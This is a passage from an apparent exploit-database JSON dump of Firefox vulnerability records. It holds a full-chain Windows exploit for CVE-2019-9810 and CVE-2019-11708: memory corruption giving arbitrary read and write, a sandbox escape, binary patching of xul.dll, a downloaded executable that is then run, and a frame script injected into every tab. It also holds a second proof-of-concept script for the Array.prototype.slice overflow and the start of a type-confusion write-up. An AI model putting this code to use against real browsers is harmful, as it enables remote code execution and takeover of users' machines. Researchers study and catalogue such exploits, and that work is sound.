https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\r\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\r\n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\r\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\r\n[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\r\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\r\n\r\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\r\n\r\n\r\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\r\n\r\nThe issue was fixed in two ways:\r\n\r\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\r\n\r\n2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.\n\n# 0day.today [2019-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32482"}, {"lastseen": "2019-12-09T22:07:26", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2019-12-09T00:00:00", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-09T00:00:00", "id": "1337DAY-ID-33639", "href": "https://0day.today/exploit/description/33639", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\r\n\r\n// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\r\n\r\n// 0:000> ? xul!sAutomationPrefIsSet - xul\r\n// Evaluate expression: 85724947 = 00000000`051c0f13\r\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\r\n// 0:000> ? xul!disabledForTest - xul\r\n// Evaluate expression: 85400792 = 00000000`05171cd8\r\nconst XuldisabledForTest = 0x05171cd8n;\r\n\r\nconst Debug = false;\r\nconst dbg = p => {\r\n if(Debug == false) {\r\n return;\r\n }\r\n\r\n print(`Debug: ${p}`);\r\n};\r\n\r\nconst ArraySize = 0x5;\r\nconst WantedArraySize = 0x42424242;\r\n\r\nlet arr = null;\r\nlet Trigger = false;\r\nconst Spray = [];\r\n\r\nfunction f(Special, Idx, Value) {\r\n arr[Idx] = 0x41414141;\r\n Special.slice();\r\n arr[Idx] = Value;\r\n}\r\n\r\nclass SoSpecial extends Array {\r\n static get [Symbol.species]() {\r\n return function() {\r\n if(!Trigger) {\r\n return;\r\n }\r\n\r\n arr.length = 0;\r\n for(let i = 0; i < 0x40000; i++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n };\r\n }\r\n};\r\n\r\nfunction GetMeBiggie() {\r\n for(let Idx = 0; Idx < 0x100000; Idx++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n\r\n const SpecialSnowFlake = new SoSpecial();\r\n for(let Idx = 0; Idx < 10; Idx++) {\r\n arr = new Array(0x7e);\r\n Trigger = false;\r\n for(let Idx = 0; Idx < 0x400; Idx++) {\r\n f(SpecialSnowFlake, 0x70, Idx);\r\n }\r\n\r\n Trigger = true;\r\n f(SpecialSnowFlake, 47, WantedArraySize);\r\n if(arr.length != 0) {\r\n continue;\r\n }\r\n\r\n const Biggie = Spray.find(e => e.length != ArraySize);\r\n if(Biggie != null) {\r\n return Biggie;\r\n }\r\n }\r\n\r\n return null;\r\n}\r\n\r\nfunction ExploitCVE_2019_9810() {\r\n print = console.log;\r\n\r\n const Biggie = GetMeBiggie();\r\n if(Biggie == null || Biggie.length != WantedArraySize) {\r\n dbg('Failed to set things up :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Scan for one of the Uint32Array we sprayed earlier.\r\n //\r\n\r\n let Biggie2AdjacentSize = null;\r\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\r\n for(let Idx = 0; Idx < 0x100; Idx++) {\r\n const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\r\n if(Qword == JSValueArraySize) {\r\n Biggie2AdjacentSize = Idx + 1;\r\n break;\r\n }\r\n }\r\n\r\n if(Biggie2AdjacentSize == null) {\r\n dbg('Failed to find an adjacent array :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Use the array length as a marker.\r\n //\r\n\r\n const AdjacentArraySize = 0xbbccdd;\r\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\r\n\r\n //\r\n // Find the array now..\r\n //\r\n\r\n const AdjacentArray = Spray.find(\r\n e => e.length == AdjacentArraySize\r\n );\r\n\r\n if(AdjacentArray == null) {\r\n dbg('Failed to find the corrupted adjacent array :(.');\r\n return false;\r\n }\r\n\r\n const ReadPtr = Addr => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Read arbitrary location now.\r\n //\r\n\r\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return Ptr;\r\n };\r\n\r\n const WritePtr = (Addr, Value) => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Write to arbitrary location now.\r\n //\r\n\r\n AdjacentArray[0] = Number(Value & 0xffffffffn);\r\n AdjacentArray[1] = Number(Value >> 32n);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return true;\r\n };\r\n\r\n const AddrOf = Obj => {\r\n AdjacentArray.hell_on_earth = Obj;\r\n // 0:000> dqs 1ae5716e76a0\r\n // 00001ae5`716e76a0 00001ae5`7167dfd0\r\n // 00001ae5`716e76a8 000010c5`8e73c6a0\r\n // 00001ae5`716e76b0 00000238`9334e790\r\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\r\n // 00001ae5`716e76c0 fffa0000`00000000\r\n // 00001ae5`716e76c8 fff88000`00bbccdd\r\n // 0:000> !telescope 0x00002389334e790\r\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\r\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\r\n const SlotsAddress = BigInt.fromUint32s(\r\n Biggie.slice(SlotOffset, SlotOffset + 2)\r\n );\r\n\r\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\r\n };\r\n\r\n //\r\n // Let's move the battle field to the TenuredHeap\r\n //\r\n\r\n const ArrayBufferLength = 10;\r\n const AB1 = new ArrayBuffer(ArrayBufferLength);\r\n const AB2 = new ArrayBuffer(ArrayBufferLength);\r\n const AB1Address = AddrOf(AB1);\r\n const AB2Address = AddrOf(AB2);\r\n\r\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\r\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\r\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\r\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\r\n\r\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\r\n dbg('Corrupting the ArrayBuffers failed :(.');\r\n return false;\r\n }\r\n\r\n const Primitives = BuildPrimitives(AB1, AB2);\r\n Math.atan2(AB2);\r\n\r\n //\r\n // All right, time to clean up behind ourselves.\r\n // Let's fix AdjacentArray's size first (as we are using Biggie to do it).\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = ArraySize;\r\n\r\n //\r\n // Let's fix Biggie's length as we are done with it.\r\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\r\n // Detected xul.dll, using it as js module.\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\r\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\r\n //\r\n // 0:000> !telescope 0x11e6fa2f7580\r\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\r\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\r\n // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\r\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\r\n //\r\n\r\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\r\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\r\n\r\n //\r\n // From there, we're kinda done - let's get god mode and fuck off.\r\n //\r\n\r\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\r\n return true;\r\n}\r\n\r\n//\r\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\r\n// `docShell` object off the `window` object. Once it has it, it can grab the frame\r\n// `messageManager` that we need to trigger the sandbox escape.\r\n//\r\n\r\nfunction GetContentFrameMessageManager(Win) {\r\n function _GetDocShellFromWindow(Win) {\r\n return Win.docShell;\r\n }\r\n\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n const Cu = Components.utils;\r\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\r\n const Code = _GetDocShellFromWindow.toSource();\r\n Cu.evalInSandbox(Code, Sbx);\r\n const DocShell = Sbx._GetDocShellFromWindow(Win);\r\n Cu.nukeSandbox(Sbx);\r\n return DocShell.messageManager;\r\n}\r\n\r\n//\r\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\r\n// with an URI.\r\n//\r\n\r\nfunction PromptOpen(Uri) {\r\n const FrameMM = GetContentFrameMessageManager(window);\r\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\r\n return Result;\r\n}\r\n\r\n//\r\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\r\n// process and escape the sandbox.\r\n//\r\n\r\nfunction TriggerCVE_2019_11708() {\r\n PromptOpen(`${location.origin}?stage3`);\r\n}\r\n\r\n//\r\n// This is the function that gets written into the frame script the exploit drops\r\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\r\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\r\n// Services.mm.loadFrameScript('file://frame-script.js', true)\r\n// This should break in the `Browser Content Toolbox` debugger window.\r\n//\r\n\r\nfunction FrameScriptPayload() {\r\n function PimpMyDocument() {\r\n\r\n //\r\n // Don't infect doar-e and leave Cthulhu alone...\r\n //\r\n\r\n if(content.document.location.origin == 'https://doar-e.github.io' ||\r\n content.document.location.origin == 'http://localhost:8000') {\r\n return;\r\n }\r\n\r\n //\r\n // .. as well as don't play with non http origins (I've seen empty/null origins).\r\n //\r\n\r\n if(!content.document.location.origin.startsWith('http')) {\r\n return;\r\n }\r\n\r\n //\r\n // Time to party! Let's find every `A` tag and make them point to doar-e.\r\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\r\n // style attributes to `none` / `transparent` to not hide the doar-e background.\r\n //\r\n\r\n for(const Node of content.document.getElementsByTagName('*')) {\r\n if(Node.tagName == 'A') {\r\n Node.href = 'https://doar-e.github.io/';\r\n continue;\r\n }\r\n\r\n Node.style.backgroundImage = 'none';\r\n Node.style.backgroundColor = 'transparent';\r\n }\r\n\r\n //\r\n // Change the background.\r\n //\r\n\r\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\r\n }\r\n\r\n //\r\n // First we set an event handler to make sure to be invoked when a new `content`\r\n // is created. Keep in mind that we basically have ~three cases to handle:\r\n // 1/ We are getting injected in an already existing tab,\r\n // 2/ We are getting injected in a new tab,\r\n // 3/ A user clicks on a link and a new `content` gets created.\r\n // We basically want to have control over those three events. The below ensures\r\n // we get a chance to execute code for 2/.\r\n //\r\n\r\n addEventListener('DOMWindowCreated', FrameScriptPayload);\r\n dump(`Hello from: ${content.location.origin}\\n`);\r\n\r\n if(content.document != null && content.document.body != null) {\r\n\r\n //\r\n // Either the tab already existed in which case we already have a document which we\r\n // can play with...\r\n //\r\n\r\n PimpMyDocument();\r\n return;\r\n }\r\n\r\n //\r\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\r\n //\r\n\r\n content.addEventListener('load', PimpMyDocument);\r\n}\r\n\r\n//\r\n// This function drops a file (open + write + close) using the OSFile JS module.\r\n//\r\n\r\nfunction DropFile(Path, Content) {\r\n\r\n //\r\n // We expect either a string or a TypedArray.\r\n //\r\n\r\n const Encoder = new TextEncoder();\r\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\r\n return OS.File.open(Path, {write: true, truncate: true})\r\n .then(File => {\r\n return Promise.all([\r\n // We return the File object in order to be able to use it in the\r\n // next `.then`. This allows us to chain the `write` and the `close`\r\n // without another level of deepness.\r\n File,\r\n File.write(ContentBuffer),\r\n ]);\r\n })\r\n .then((Results) => {\r\n const [File, _WrittenBytes] = Results;\r\n return File.close();\r\n });\r\n}\r\n\r\n//\r\n// This function drops / executes a payload binary, as well as inject a frame script\r\n// into every tabs.\r\n//\r\n\r\nfunction Payload() {\r\n\r\n //\r\n // Import a bunch of JS modules we will be using later.\r\n //\r\n\r\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n\r\n //\r\n // First order of business, we create a first promise that downloads the payload\r\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\r\n //\r\n\r\n const Dir = OS.Constants.Path.localProfileDir;\r\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\r\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\r\n .then((Response) => {\r\n\r\n //\r\n // We return the result as a TypedArray as this is what `DropFile`\r\n // expects for binary content.\r\n //\r\n\r\n return Response.arrayBuffer();\r\n })\r\n .then((Content) => {\r\n\r\n //\r\n // Time to drop the file now. Note that we return the promise so\r\n // the next `then` executes when the file has been successfully dropped.\r\n //\r\n\r\n dbg(`Payload downloaded.`);\r\n return DropFile(PayloadPath, new Uint8Array(Content));\r\n })\r\n .then(() => {\r\n\r\n //\r\n // At this point, we are ready to spawn the payload, let's do it!\r\n //\r\n\r\n dbg(`Creating the process.. ${PayloadPath}`);\r\n CreateProcessA(PayloadPath);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in payload promise: ${Ex}`);\r\n });\r\n\r\n //\r\n // Second order of business is to backdoor the tabs. To do so, we drop a frame\r\n // script that we inject into every tabs.\r\n //\r\n\r\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\r\n\r\nFrameScriptPayload();`;\r\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\r\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\r\n .then(() => {\r\n\r\n //\r\n // At this time we are ready to inject the frame script into the tabs.\r\n // Note that we need to drop the file locally / use the file:// scheme\r\n // so that the tabs accept to interpret the file (unfortunately,\r\n // remote ones are ignored).\r\n //\r\n\r\n dbg(`About to loadFrameScript: ${ScriptPath}`);\r\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in frame payload promise: ${Ex}`);\r\n });\r\n\r\n\r\n //\r\n // Last but not least, we set up code to execute on completion of both the above\r\n // promises. You have to remember that at this point the modal window is still open\r\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\r\n // to be as stealth as possible.\r\n // Just for kicks, we spawn a calculator when we're done because why not.\r\n //\r\n\r\n Promise.all([PayloadPromise, FramePayloadPromise])\r\n .then(() => {\r\n\r\n //\r\n // .. just for kicks.\r\n //\r\n\r\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\r\n\r\n //\r\n // Phew, we made it here let's close the window :).\r\n //\r\n\r\n window.close();\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in clean up promise: ${Ex}`);\r\n window.close();\r\n });\r\n}\r\n\r\n//\r\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\r\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\r\n// god mode. It's far from being the cleanest way, but this is the easiest way I found.\r\n//\r\n// nsresult nsSocketTransport::InitiateSocket() {\r\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\r\n// nsresult rv;\r\n// bool isLocal;\r\n// IsLocal(&isLocal);\r\n// if (gIOService->IsNetTearingDown()) {\r\n// return NS_ERROR_ABORT;\r\n// }\r\n// if (gIOService->IsOffline()) {\r\n// if (!isLocal) return NS_ERROR_OFFLINE;\r\n// } else if (!isLocal) {\r\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\r\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\r\n// nsAutoCString ipaddr;\r\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\r\n// netaddr->GetAddress(ipaddr);\r\n// fprintf_stderr(\r\n// stderr,\r\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\r\n// \"connection \"\r\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\r\n// \"available via the test networking proxy (if running mochitests) \"\r\n// \"or from a test-specific httpd.js server (if running xpcshell \"\r\n// \"tests). \"\r\n// \"Browser services should be disabled or redirected to a local \"\r\n// \"server.\\n\",\r\n// mHost.get(), ipaddr.get());\r\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\r\n// }\r\n// }\r\n//\r\n\r\nfunction PatchInitiateSocket() {\r\n\r\n //\r\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // so that it doesn't assert on us because we turned on testing features.\r\n // This is the assert we hit without the patch:\r\n //\r\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\r\n // You should only access hostnames available via the test networking proxy\r\n // (if running mochitests) or from a test-specific httpd.js server (if running\r\n // xpcshell tests). Browser services should be disabled or redirected to a local\r\n // server.\r\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\r\n // 00007ff9`69a66372 cc int 3\r\n //\r\n // Here is the disasembly before:\r\n //\r\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\r\n //\r\n // And after:\r\n //\r\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 90 nop\r\n // 00007ff9`3f9c55c7 90 nop\r\n // 00007ff9`3f9c55c8 90 nop\r\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n //\r\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\r\n // Evaluate expression: 1529286 = 00000000`001755c6\r\n //\r\n\r\n const PatchOffset = 0x001755c6n;\r\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\r\n const PatchAddress = XulBase + PatchOffset;\r\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\r\n PatchCode(PatchAddress, PatchContent);\r\n}\r\n\r\nfunction Main(Route) {\r\n\r\n //\r\n // One way to tell if we were successful with our data corruption is by checking\r\n // if we have access to the PrivilegeManager. If we do, it means we are running\r\n // with a privileged context, if not we don't.\r\n //\r\n\r\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\r\n if(Route == '?stage1') {\r\n\r\n //\r\n // If we are asked to run stage1 with access to a privileged context, we skip\r\n // it and move on to stage2.\r\n //\r\n\r\n if(RunningFromPrivilegedJS) {\r\n return Main('?stage2');\r\n }\r\n\r\n //\r\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\r\n // a privileged JS context.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Failed :(');\r\n return;\r\n }\r\n\r\n //\r\n // Once we are done with the data corruption, we refresh the page to get access\r\n // to the privileged JS context. Moving on to stage2 \\o/.\r\n //\r\n\r\n location.replace(`${location.origin}/?stage2`);\r\n }\r\n\r\n if(Route == '?stage2') {\r\n\r\n //\r\n // At this point we expect to have access to a privileged JS context.\r\n // If we don't it's probably bad news, so we'll just bail.\r\n //\r\n\r\n if(!RunningFromPrivilegedJS) {\r\n alert('problem');\r\n return;\r\n }\r\n\r\n //\r\n // Turn on privileges so that we can access the `Components` object.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // Now that we have access to the privileged context, we are also able to talk\r\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\r\n // exploit the parent process.\r\n //\r\n\r\n TriggerCVE_2019_11708();\r\n }\r\n\r\n if(Route == '?stage3') {\r\n\r\n //\r\n // We should now be running in the broker which means we can exploit CVE-2019-9810\r\n // to perform the same attack than in stage1 but this time in the parent process.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Elevation failed, closing the window.');\r\n window.close();\r\n }\r\n\r\n //\r\n // If we are successful it means that by refreshing the page, we should have\r\n // access to the privileged JS context from the parent process.\r\n // This basically means full compromise and we move on to backdooring the tabs,\r\n // as well as dropping the payload.\r\n //\r\n\r\n location.replace(`${location.origin}/?final`);\r\n }\r\n\r\n if(Route == '?final') {\r\n\r\n //\r\n // All right, we start of by turning on privileges so that we can access `Components`\r\n // & cie.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // We've worked hard to get here and it's time to drop the goodies :).\r\n //\r\n\r\n Payload();\r\n }\r\n}\r\n\r\nfunction Onload() {\r\n if(location.search != '') {\r\n Main(location.search);\r\n }\r\n}\n\n# 0day.today [2019-12-09] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33639"}], "packetstorm": [{"lastseen": "2019-03-28T22:53:29", "description": "", "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Firefox Array.prototype.slice Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152251", "href": "https://packetstormsecurity.com/files/152251/Firefox-Array.prototype.slice-Buffer-Overflow.html", "sourceData": "`<script> \n \nlet size = 64; \n \ngarr = []; \nj = 0; \nfunction gc(){ \nvar tmp = []; \nfor(let i = 0;i < 0x20000;i++){ \ntmp[i] = new Uint32Array(size * 2); \nfor(let j = 0;j < (size*2);j+=2){ \ntmp[i][j] = 0x12345678; \ntmp[i][j+1] = 0xfffe0123; \n} \n} \ngarr[j++] = tmp; \n} \n \nlet arr = [{},2.2]; \n \nlet obj = {}; \n \nobj[Symbol.species] = function(){ \nvictim.length = 0x0; \nfor(let i = 0;i < 0x2000;i++){ \ngvictim[i].length = 0x0; \ngvictim[i] = null; \n} \ngc(); \n//Array.isArray(garr[0][0x10000]); \nreturn [1.1]; \n} \n \nlet gvictim = []; \n \nfor(let i = 0;i < 0x1000;i++){ \ngvictim[i] = [1.1,2.2]; \ngvictim[i].length = size; \ngvictim[i].fill(3.3); \n} \n \nlet victim = [1.1,2.2]; \nvictim.length = size; \nvictim.fill(3.3); \n \nfor(let i = 0x1000;i < 0x2000;i++){ \ngvictim[i] = [1.1,2.2]; \ngvictim[i].length = size; \ngvictim[i].fill(3.3); \n} \n \nfunction fake(arg){ \n} \nfor(let i = 0;i < size;i++){ \nfake[\"x\"+i.toString()] = 2.2; \n} \n \nfunction jit(){ \nvictim[1] = 1.1; \narr.slice(); \n//fake.x2 = 6.17651672645e-312; \nreturn victim[2]; \n} \n \nflag = 0; \n \n \nfor(let i = 0;i < 0x10000;i++){ \nxx = jit(); \n} \n \narr.constructor = obj; \n \nArray.isArray(victim); \nalert(333); \nalert(jit()); \n</script> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152251/ffaps-overflow.txt"}, {"lastseen": "2019-03-30T11:26:16", "description": "", "published": "2019-03-29T00:00:00", "type": "packetstorm", "title": "SpiderMonkey IonMonkey Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-03-29T00:00:00", "id": "PACKETSTORM:152304", "href": "https://packetstormsecurity.com/files/152304/SpiderMonkey-IonMonkey-Type-Confusion.html", "sourceData": "`SpiderMonkey: IonMonkey compiled code fails to update inferred property types, leading to type confusions \n \nRelated CVE Numbers: CVE-2019-9813 \n \n \n \nA bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects. \n \n# Prerequisites \n \nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically: \n \n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below) \n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot \n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array \n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored \n \nSpidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object 